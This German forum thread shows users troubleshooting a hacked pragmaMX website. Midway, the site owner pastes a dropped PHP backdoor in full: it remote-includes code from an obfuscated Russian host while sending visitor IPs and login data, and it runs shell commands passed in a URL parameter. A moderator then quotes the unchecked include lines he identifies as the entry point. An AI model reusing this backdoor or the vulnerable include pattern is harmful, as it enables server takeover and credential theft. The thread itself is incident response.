Suche

[m-t]

2 meiner Domains hats grad erwischt.

Ich zähl mal so auf:

im Ordner:

/html/includes/detection

waren 2 Dateien neu:

properties.php

und

time.php

die config.php wurde verändert.

Wenn ich das SMF aufrufen will:

Parse error: parse error, unexpected T_STRING in /home/www/np161/html/modules/Forum/smf/Settings.php on line 28

die .css Datei im mxRainbow wurde verändert

der albums ordner von coppermine hat ebenfalls neue dateien:

.htaccess wurde verändert

include.php
includes.php
index.php
message.php

auf ner zweiten domain wurde die admin.php verändert. die habe ich versehentlich gelöscht die anderen Dateien gesichert.

[Energy-drink]

Hi

leider hast du die wichtigsten Angaben vergessen.

Welche Version vom Pragmamx benützt du zur Zeit?
Welche Modul sind eingebaut die nicht hier zum Download angeboten werden?

[m-t]

pragmaMX 0.1.8

yellowpages modul ist nicht von hier.

neu installiert wurde zuletzt smf

[m-t]

2te domain:

im albums verzeichniss von coppermine:

.htaccess verändert

neue dateien:

test.php
commands.php
common.php
contacts.php
finfo.php
layout.php
links.php
options.php
tests.php

edit: oje, in vielen verzeichnissen von coppermine sind etliche dateien neu :-(

[Energy-drink]

irgendwie gibt das für mich keinen sinn wenn es ein Hackangriff wäre. Warum würden sie so viele Datein aufspielen??
Normal läuft ein Hackangriff eigentlich ziemlich schnell ab und es wird eigentlich meistens eine HTML datein eingefügt die aufgerufen wird.

Desweiteren ergibt die struktur der abgelegten Datein keine logik. Warum legen sie datein in Coppermine ab?

Gibt es weitere User die zugriff per FTP haben??
Ist aus den Datein irgendwas rauszulesen die aufgespielt worden sind?

[jogi24]

hi

wichtig sind doch die log-files, um zu sehen was da passiert ist 

[m-t]

kein zugriff für andere, nicht auf diesen domains.

rauslesen kann ich zumindest nichts:

hier mal ein beispiel:

Code Auswählen Erweitern


<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


[jogi24]

hi

dann schreibe deinen provider an, und bitte ihn um die files !!!

dann kann Andi und jubi sich das mal anschauen !!

[m-t]

die machen grad ein backup, hab ne mail geschickt.

wenn ich was neues hab geb ich bescheid

[Andi]

Hi

bitte FTP-Zugangsdaten, Adminaccount usw. per PM an Jubilee und mich.
Möglichst auch logfiles...
Dann guggen wir mal.

Ich würde dir empfehlen, die Seiten vorübergehend vom Netz zu nehmen.
Weiss Gott, was die da alles hochgespielt haben....

[Darty]

Schau Dir auch die Coppermine genau an.

Ich tippe mal darauf!
Die hatte in der Vergangenheit sehr viele Löcher bzw.kann o. konnte direkt aufgerufen werden.

Von hier die Version hab ich nicht getestet, da ich sowas garnicht erst mehr installiere.

[Andi]

Moin

jetzt bitte nicht wild rum spekulieren.
Ich weiss nicht, wer immer noch den Quatsch mit der löchrigen Coppermine verbreitet. Das ist alles ausgemachter Blödsinn. Der nuke-Port hatte diese Löcher, nicht die Standallone Version. Die Sicherheitslücken, die zuletzt in der Standallone waren, konnten innerhalb des pragmaMx nicht ausgenutzt werden. Zudem betraf das meiste nicht die Coppermine selbst, sondern falsch konfigurierte Apache Server, die eben mit der Coppermine hochgeladene Dateien als Script interpretieren konnten....

Ich habe anhand der Logfiles die Lücke gefunden.
Es ist ein Script in einem der Unterordner, auf der einen Domain. Mit dem Teil kann man beliebige Remote Dateien includen. Das Script hat mit dem pragmaMx keine Verbindung ....


edit:
so, script zum downloaden gefunden
Wieder ein klassischer....

Code Auswählen Erweitern

include($*****_SYSTEM['server_path'].'include/javascript.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/text-out.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/images.inc'.$*****_SYSTEM['php_ext']);
Ohne check, nix....

[m-t]

so, script zum downloaden gefunden

Code Auswählen Erweitern

include($*****_SYSTEM['server_path'].'include/javascript.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/text-out.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/images.inc'.$*****_SYSTEM['php_ext']);


Hi Andi,

ich such grad diese Dateien finde aber nichts...

In welchem Unterordner soll das sein?

[Andi]

Moin

du müsstest eine mail von mir bekommen haben, da ist der Dateipfad aufgezeigt.
Näheres per PM

[m-t]

Na da hast ja was altes gefunden :-)
Das stammt noch aus nicht cms-Zeiten, lösch ich gleich, vielen dank :-)))

[manasiyok]

ammm ammm   Hacked = SpyGrup.Org 8)

by manasiyok

[Andi]

Iyi tamam sen devam konus. 

[Sitki]

Hi Andi,

wusste garnicht, dass du Türkisch kannst? Den obigen Beitrag von manasiyok (übersetzt: hat keine Bedeutung) kann ich nicht so recht einordnen?